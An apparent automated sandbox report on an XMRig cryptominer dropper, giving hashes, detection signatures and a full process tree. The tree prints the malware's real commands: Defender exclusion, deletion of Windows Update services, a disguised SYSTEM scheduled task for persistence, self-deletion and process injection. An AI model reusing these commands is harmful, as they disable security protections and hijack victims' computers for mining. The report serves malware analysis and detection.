xmrig | e244f4b3b1614865dcd266ca2e057a1d7aa2a09c87bc1feb823fb1ac858f4fa2

Analysis

max time kernel
152s
max time network
109s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
02-11-2022 11:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e6001aac5a3ee379149fd36bb6fb0d6f.exe
Size

9.4MB
MD5

e6001aac5a3ee379149fd36bb6fb0d6f
SHA1

071044b203de973c31e2504411cfa445b95402cf
SHA256

e244f4b3b1614865dcd266ca2e057a1d7aa2a09c87bc1feb823fb1ac858f4fa2
SHA512

f0f43f07b75aa5c705078e804a03ab786566bf4684211cfb88fd407c344b89dbdbac150768ed8a4a66c5e3d9f414572b7892cb0211ecfc7806fd31e376716d59
SSDEEP

196608:lKhSUcGJi2WNOVCjJ81tMeO3PNa/fm9BPq+lIx2YBWO:KYWi2WqCjJMmc/b+lNk

Score

10^/10

xmrig evasion miner upx

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/1100-147-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/1100-151-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

Processes:

WindowsAutHost

pid process

1752 WindowsAutHost
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
1752	WindowsAutHost

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/1100-147-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/1100-151-0x0000000140000000-0x00000001407F4000-memory.dmp	upx

Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

1008 cmd.exe
Loads dropped DLL 1 IoCs

Processes:

taskeng.exe

pid process

2004 taskeng.exe

pid	process
1008	cmd.exe

pid	process
2004	taskeng.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

WindowsAutHost

description	pid	process	target process
PID 1752 set thread context of 1660	1752	WindowsAutHost	conhost.exe
PID 1752 set thread context of 1100	1752	WindowsAutHost	svchost.exe

Drops file in Program Files directory 4 IoCs

Processes:

e6001aac5a3ee379149fd36bb6fb0d6f.exeWindowsAutHostcmd.execmd.exe

description	ioc	process
File created	C:\Program Files\WindowsServices\WindowsAutHost	e6001aac5a3ee379149fd36bb6fb0d6f.exe
File created	C:\Program Files\Google\Libs\WR64.sys	WindowsAutHost
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

1288 sc.exe
1292 sc.exe
1980 sc.exe
988 sc.exe
1092 sc.exe
2012 sc.exe
1504 sc.exe
880 sc.exe
1588 sc.exe
1628 sc.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1892 schtasks.exe
1132 schtasks.exe

pid	process
1288	sc.exe
1292	sc.exe
1980	sc.exe
988	sc.exe
1092	sc.exe
2012	sc.exe
1504	sc.exe
880	sc.exe
1588	sc.exe
1628	sc.exe

pid	process
1892	schtasks.exe
1132	schtasks.exe

Modifies data under HKEY_USERS 3 IoCs

Processes:

WMIC.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f00e842eb7eed801	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

e6001aac5a3ee379149fd36bb6fb0d6f.exepowershell.exepowershell.exepowershell.exeWindowsAutHostpowershell.exepowershell.exesvchost.exe

pid	process
1640	e6001aac5a3ee379149fd36bb6fb0d6f.exe
1892	powershell.exe
1644	powershell.exe
1900	powershell.exe
1752	WindowsAutHost
1096	powershell.exe
1048	powershell.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe
1100	svchost.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

464

pid	process
464

Suspicious use of AdjustPrivilegeToken 39 IoCs

Processes:

powershell.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowershell.exepowershell.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowercfg.exeWindowsAutHostWMIC.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	1892	powershell.exe
Token: SeShutdownPrivilege	904	powercfg.exe
Token: SeShutdownPrivilege	1400	powercfg.exe
Token: SeShutdownPrivilege	1624	powercfg.exe
Token: SeDebugPrivilege	1644	powershell.exe
Token: SeShutdownPrivilege	560	powercfg.exe
Token: SeDebugPrivilege	1900	powershell.exe
Token: SeDebugPrivilege	1096	powershell.exe
Token: SeShutdownPrivilege	680	powercfg.exe
Token: SeShutdownPrivilege	1992	powercfg.exe
Token: SeDebugPrivilege	1048	powershell.exe
Token: SeShutdownPrivilege	1976	powercfg.exe
Token: SeShutdownPrivilege	1652	powercfg.exe
Token: SeDebugPrivilege	1752	WindowsAutHost
Token: SeAssignPrimaryTokenPrivilege	1080	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1080	WMIC.exe
Token: SeSecurityPrivilege	1080	WMIC.exe
Token: SeTakeOwnershipPrivilege	1080	WMIC.exe
Token: SeLoadDriverPrivilege	1080	WMIC.exe
Token: SeSystemtimePrivilege	1080	WMIC.exe
Token: SeBackupPrivilege	1080	WMIC.exe
Token: SeRestorePrivilege	1080	WMIC.exe
Token: SeShutdownPrivilege	1080	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1080	WMIC.exe
Token: SeUndockPrivilege	1080	WMIC.exe
Token: SeManageVolumePrivilege	1080	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1080	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1080	WMIC.exe
Token: SeSecurityPrivilege	1080	WMIC.exe
Token: SeTakeOwnershipPrivilege	1080	WMIC.exe
Token: SeLoadDriverPrivilege	1080	WMIC.exe
Token: SeSystemtimePrivilege	1080	WMIC.exe
Token: SeBackupPrivilege	1080	WMIC.exe
Token: SeRestorePrivilege	1080	WMIC.exe
Token: SeShutdownPrivilege	1080	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1080	WMIC.exe
Token: SeUndockPrivilege	1080	WMIC.exe
Token: SeManageVolumePrivilege	1080	WMIC.exe
Token: SeLockMemoryPrivilege	1100	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

e6001aac5a3ee379149fd36bb6fb0d6f.execmd.execmd.exepowershell.execmd.exe

description	pid	process	target process
PID 1640 wrote to memory of 1892	1640	e6001aac5a3ee379149fd36bb6fb0d6f.exe	powershell.exe
PID 1640 wrote to memory of 1892	1640	e6001aac5a3ee379149fd36bb6fb0d6f.exe	powershell.exe
PID 1640 wrote to memory of 1892	1640	e6001aac5a3ee379149fd36bb6fb0d6f.exe	powershell.exe
PID 1640 wrote to memory of 1212	1640	e6001aac5a3ee379149fd36bb6fb0d6f.exe	cmd.exe
PID 1640 wrote to memory of 1212	1640	e6001aac5a3ee379149fd36bb6fb0d6f.exe	cmd.exe
PID 1640 wrote to memory of 1212	1640	e6001aac5a3ee379149fd36bb6fb0d6f.exe	cmd.exe
PID 1640 wrote to memory of 1364	1640	e6001aac5a3ee379149fd36bb6fb0d6f.exe	cmd.exe
PID 1640 wrote to memory of 1364	1640	e6001aac5a3ee379149fd36bb6fb0d6f.exe	cmd.exe
PID 1640 wrote to memory of 1364	1640	e6001aac5a3ee379149fd36bb6fb0d6f.exe	cmd.exe
PID 1640 wrote to memory of 1644	1640	e6001aac5a3ee379149fd36bb6fb0d6f.exe	powershell.exe
PID 1640 wrote to memory of 1644	1640	e6001aac5a3ee379149fd36bb6fb0d6f.exe	powershell.exe
PID 1640 wrote to memory of 1644	1640	e6001aac5a3ee379149fd36bb6fb0d6f.exe	powershell.exe
PID 1212 wrote to memory of 1288	1212	cmd.exe	sc.exe
PID 1212 wrote to memory of 1288	1212	cmd.exe	sc.exe
PID 1212 wrote to memory of 1288	1212	cmd.exe	sc.exe
PID 1364 wrote to memory of 904	1364	cmd.exe	powercfg.exe
PID 1364 wrote to memory of 904	1364	cmd.exe	powercfg.exe
PID 1364 wrote to memory of 904	1364	cmd.exe	powercfg.exe
PID 1212 wrote to memory of 1292	1212	cmd.exe	sc.exe
PID 1212 wrote to memory of 1292	1212	cmd.exe	sc.exe
PID 1212 wrote to memory of 1292	1212	cmd.exe	sc.exe
PID 1364 wrote to memory of 1400	1364	cmd.exe	powercfg.exe
PID 1364 wrote to memory of 1400	1364	cmd.exe	powercfg.exe
PID 1364 wrote to memory of 1400	1364	cmd.exe	powercfg.exe
PID 1212 wrote to memory of 880	1212	cmd.exe	sc.exe
PID 1212 wrote to memory of 880	1212	cmd.exe	sc.exe
PID 1212 wrote to memory of 880	1212	cmd.exe	sc.exe
PID 1212 wrote to memory of 1980	1212	cmd.exe	sc.exe
PID 1212 wrote to memory of 1980	1212	cmd.exe	sc.exe
PID 1212 wrote to memory of 1980	1212	cmd.exe	sc.exe
PID 1364 wrote to memory of 1624	1364	cmd.exe	powercfg.exe
PID 1364 wrote to memory of 1624	1364	cmd.exe	powercfg.exe
PID 1364 wrote to memory of 1624	1364	cmd.exe	powercfg.exe
PID 1212 wrote to memory of 988	1212	cmd.exe	sc.exe
PID 1212 wrote to memory of 988	1212	cmd.exe	sc.exe
PID 1212 wrote to memory of 988	1212	cmd.exe	sc.exe
PID 1364 wrote to memory of 560	1364	cmd.exe	powercfg.exe
PID 1364 wrote to memory of 560	1364	cmd.exe	powercfg.exe
PID 1364 wrote to memory of 560	1364	cmd.exe	powercfg.exe
PID 1212 wrote to memory of 268	1212	cmd.exe	reg.exe
PID 1212 wrote to memory of 268	1212	cmd.exe	reg.exe
PID 1212 wrote to memory of 268	1212	cmd.exe	reg.exe
PID 1212 wrote to memory of 1092	1212	cmd.exe	reg.exe
PID 1212 wrote to memory of 1092	1212	cmd.exe	reg.exe
PID 1212 wrote to memory of 1092	1212	cmd.exe	reg.exe
PID 1212 wrote to memory of 1992	1212	cmd.exe	reg.exe
PID 1212 wrote to memory of 1992	1212	cmd.exe	reg.exe
PID 1212 wrote to memory of 1992	1212	cmd.exe	reg.exe
PID 1212 wrote to memory of 524	1212	cmd.exe	reg.exe
PID 1212 wrote to memory of 524	1212	cmd.exe	reg.exe
PID 1212 wrote to memory of 524	1212	cmd.exe	reg.exe
PID 1212 wrote to memory of 1820	1212	cmd.exe	reg.exe
PID 1212 wrote to memory of 1820	1212	cmd.exe	reg.exe
PID 1212 wrote to memory of 1820	1212	cmd.exe	reg.exe
PID 1644 wrote to memory of 1132	1644	powershell.exe	schtasks.exe
PID 1644 wrote to memory of 1132	1644	powershell.exe	schtasks.exe
PID 1644 wrote to memory of 1132	1644	powershell.exe	schtasks.exe
PID 1640 wrote to memory of 1900	1640	e6001aac5a3ee379149fd36bb6fb0d6f.exe	powershell.exe
PID 1640 wrote to memory of 1900	1640	e6001aac5a3ee379149fd36bb6fb0d6f.exe	powershell.exe
PID 1640 wrote to memory of 1900	1640	e6001aac5a3ee379149fd36bb6fb0d6f.exe	powershell.exe
PID 1640 wrote to memory of 1008	1640	e6001aac5a3ee379149fd36bb6fb0d6f.exe	cmd.exe
PID 1640 wrote to memory of 1008	1640	e6001aac5a3ee379149fd36bb6fb0d6f.exe	cmd.exe
PID 1640 wrote to memory of 1008	1640	e6001aac5a3ee379149fd36bb6fb0d6f.exe	cmd.exe
PID 1008 wrote to memory of 1072	1008	cmd.exe	choice.exe

C:\Users\Admin\AppData\Local\Temp\e6001aac5a3ee379149fd36bb6fb0d6f.exe
"C:\Users\Admin\AppData\Local\Temp\e6001aac5a3ee379149fd36bb6fb0d6f.exe"
1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1640

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1892

C:\Windows\system32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:1212

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:1288

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:1292

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:1092

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:2012

C:\Windows\system32\sc.exe
sc stop bits
4⤵
- Launches sc.exe
PID:1504

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
4⤵
PID:2016

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
4⤵
PID:2024

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
4⤵
PID:1136

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
4⤵
PID:1472

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
4⤵
PID:808

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
- Launches sc.exe
PID:1588

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:1628

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:880

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:1980

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:988

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:268

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:1092

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
- Modifies security service
PID:1992

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:524

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:1820

C:\Windows\system32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:1364

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:904

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1400

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1624

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:560

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#ujtstfzc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsAutHost' /tr '''C:\Program Files\WindowsServices\WindowsAutHost'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsServices\WindowsAutHost') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsAutHost' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsAutHost" /t REG_SZ /f /d 'C:\Program Files\WindowsServices\WindowsAutHost' }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1644

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn WindowsAutHost /tr "'C:\Program Files\WindowsServices\WindowsAutHost'"
3⤵
- Creates scheduled task(s)
PID:1132

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#agjywv#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "WindowsAutHost" } Else { "C:\Program Files\WindowsServices\WindowsAutHost" }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1900

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn WindowsAutHost
3⤵
PID:1708

C:\Windows\system32\cmd.exe
cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\e6001aac5a3ee379149fd36bb6fb0d6f.exe"
2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:1008

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
3⤵
PID:1072

C:\Windows\system32\taskeng.exe
taskeng.exe {15CD5328-37FC-4AD2-BF4A-B007E8C8A588} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Loads dropped DLL
PID:2004

C:\Program Files\WindowsServices\WindowsAutHost
"C:\Program Files\WindowsServices\WindowsAutHost"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1752

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1096

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#ujtstfzc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsAutHost' /tr '''C:\Program Files\WindowsServices\WindowsAutHost'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsServices\WindowsAutHost') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsAutHost' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsAutHost" /t REG_SZ /f /d 'C:\Program Files\WindowsServices\WindowsAutHost' }
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1048

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn WindowsAutHost /tr "'C:\Program Files\WindowsServices\WindowsAutHost'"
4⤵
- Creates scheduled task(s)
PID:1892

C:\Windows\system32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
3⤵
PID:436

C:\Windows\system32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:1292

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
3⤵
- Drops file in Program Files directory
PID:1580

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
4⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1080

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe qeiyvjdhkxdq
3⤵
PID:1660

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe gnbfrobbqdiittna 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
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1100

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:680

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
1⤵
